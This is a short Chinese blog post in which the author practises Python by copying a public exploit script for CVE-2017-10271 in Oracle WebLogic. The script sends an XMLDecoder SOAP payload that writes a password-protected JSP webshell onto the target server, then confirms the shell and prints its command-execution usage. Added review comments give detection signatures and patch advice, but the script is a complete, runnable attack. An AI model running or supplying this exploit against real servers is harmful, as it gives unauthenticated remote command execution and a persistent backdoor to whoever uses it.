好久没有写python,然后准备要用python来做课设,现在就想认真学习python。正好在Tools看到大神发的exp,就想用Python练习一波。
# coding = utf-8
import requests
import sys
def exp(url):
# NOTE(review): this is a verbatim public proof-of-concept for CVE-2017-10271
# (WebLogic WLS-WSAT XMLDecoder deserialization). The comments below are
# written for detection and mitigation; the code itself is left untouched.
# `url` is the WebLogic base URL given on the command line (see __main__).
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
# Static session cookie copied into the script as a literal: a fixed string
# like this is a useful signature of this exact tool in web-server logs.
'Cookie': 'JSESSIONID=nczyhG8NwQ8ypTPHBCBlDwBk26XQD2vSpC4m9hqTvn4Jgy0nrCMJ!1975769378',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
# Content-Type is text/xml, not a SOAP-specific type; Content-Length is a
# hard-coded literal rather than derived from len(payload).
'Content-Type': 'text/xml',
'Content-Length': '2579'}
# SOAP envelope whose WorkContext header carries a java.beans.XMLDecoder
# document. On an unpatched server the decoder instantiates
# java.io.PrintWriter on a path inside the deployed wls-wsat webapp and
# println's a JSP source into it -- an unauthenticated file write.
# Defenders: `java.beans.XMLDecoder` (or `<java version=`) inside a POST body
# to /wls-wsat/* is the well-known network signature for this CVE; on the
# host, any new .jsp under servers/*/tmp/_WL_internal/wls-wsat/ is a
# high-confidence compromise indicator. Oracle's October 2017 Critical Patch
# Update fixes the issue; where wls-wsat is unused it can be undeployed or
# its path blocked at the reverse proxy.
payload = '''<soapenv:Envelope xmlns:soapenv="https://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="https://bea.com/2004/06/soap/workarea/">
<java>
<java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.jsp</string>
<void method="println"><string><%     if("passw@rd".equals(request.getParameter("pwd")))     {         java.io.InputStream in=Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();         int a = -1;         byte[] b = new byte[2048];         out.print("<pre>");         while((a=in.read(b))!=-1)         {             out.println(new String(b));         }         out.print("</pre>");     } %></string></void><void method="close"/>
</object>
</java>
</java>
</work:WorkContext>
</soapenv:Header><soapenv:Body/></soapenv:Envelope>'''
# The vulnerable endpoint is /wls-wsat/CoordinatorPortType. The response `r`
# is never inspected; success is judged only by the follow-up GET below.
r = requests.post(url=url+"/wls-wsat/CoordinatorPortType",data=payload,headers=header)
# A 200 on the dropped file means the server-side write succeeded, i.e. the
# host is unpatched and now carries a webshell that must be removed.
rr = requests.get(url=url+"/wls-wsat/test.jsp")
if rr.status_code == 200:
print "CVE-2017-10271 is Valuble"
print "shell:%s/wls-wsat/test.jsp"%url
print "Post:pwd=passw@rd&i=Command"
else:
print "Getshell failure!"
if __name__ == '__main__':
# Script entry: takes exactly one positional argument, the target base URL.
try:
url = sys.argv[1]
# Bare except: catches the IndexError for a missing argument, but also
# masks KeyboardInterrupt/SystemExit and anything else raised here.
except:
print "Usage: wls_Getshell.py https://test/"
# exit() is the site-module convenience, not sys.exit(); it is absent
# when Python runs with -S.
exit()
exp(url)